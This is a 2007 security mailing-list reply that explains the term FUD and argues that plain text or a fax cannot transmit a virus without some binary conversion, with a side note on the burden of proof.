Security Basics mailing list archives

RE: FUD - was FAX a virus

From: Bob Radvanovsky <rsradvan () unixworks net>
Date: Tue, 06 Mar 2007 13:09:39 -0600

See comments below...

-rad

----- Original Message -----
From: Craig Wright [mailto:cwright () bdosyd com au]
To: Robert Wesley McGrew [mailto:wesley () mcgrewsecurity com], security-basics () securityfocus com
Subject: RE: FUD - was FAX a virus

I am not directing my responses at a particular person, but to everyone. FUD
is bad, please think first.

I wanted to clarify what "FUD" was, since some people might not understand it's meaning.

FUD = Fear, Uncertainty, and Doubt (ref: http://en.wikipedia.org/wiki/Fear%2C_uncertainty_and_doubt).

In my humble opinion (IMHO), introduction of FUD into any given scenario can signify several factors: (1) the
individual is "bluffing" their circumstance, case or objective, (2) has no idea of the subject matter being
communicated, or (3) is utilizing their circumstance as a method of either: (3a) "stonewalling" or stalling for a given
timeframe, or at which timeframe it becomes necessary to proceed forward, whatever may be the situation (aka "a stall
tactic"); and/or (3b) perverting the situation (based upon the circumstancial information given) in causing the
opposing faction(s) to present their evidence.

With regards to the discussion that has been ensuing over the past several days, I agree with Dr. Wright in that the
evidence suggests that textual information lacks any relevance towards implicating a virus transmitted, unless
otherwise transformed into, via, or through a binary conversion (the term "binary conversion" is representative of
non-binary code, data or information converted into a binary format, usually through a binary conversion process, such
as a data compression utility, or compilation utility).  If the implications were to indicate that a virus *were* to
exist, this would be (more than likely) indicative of the binary process associative to the textual data; meaning,
either the compiler, or utility that the text is associated to or "bound to" contains a viral fragment (or even a virus
in its entirety), or was bound to an application through such a binary conversion process such that the textual data is
now associated and interlaced with viral code.

The relevance is that it would be improbable, if not impossible, to associate that textual data can transmit a virus or
any form of malicious code whatsoever, unless it has undergone a binary transformation or conversion process.

Scientifically, I should not have to disprove an event. You have to prove it
is possible. I will even allow you to do this at a low alpha (say 20% rather
than a standard 5%) . Please formula an experiment that demonstrate a slight
possibility of the event. Remember, scientifically, you have to prove the
hypothesis, I do not need to disprove yours (although I can more than likely
proabilistically  do this in this rare situation).

Uh, legally, too.  In a court of law within the U.S., it's not that you have to *disprove* your case or circumstance;
but rather, that the opposing party must *prove* it...(of course) within reason.  If the courts deem a case or
circumstance to be defined as "unreasonable", then that evidentiary material would be dismissed from a given case.  In
this circusmtance, this would (more than like) be the situation.

Regards,
Craig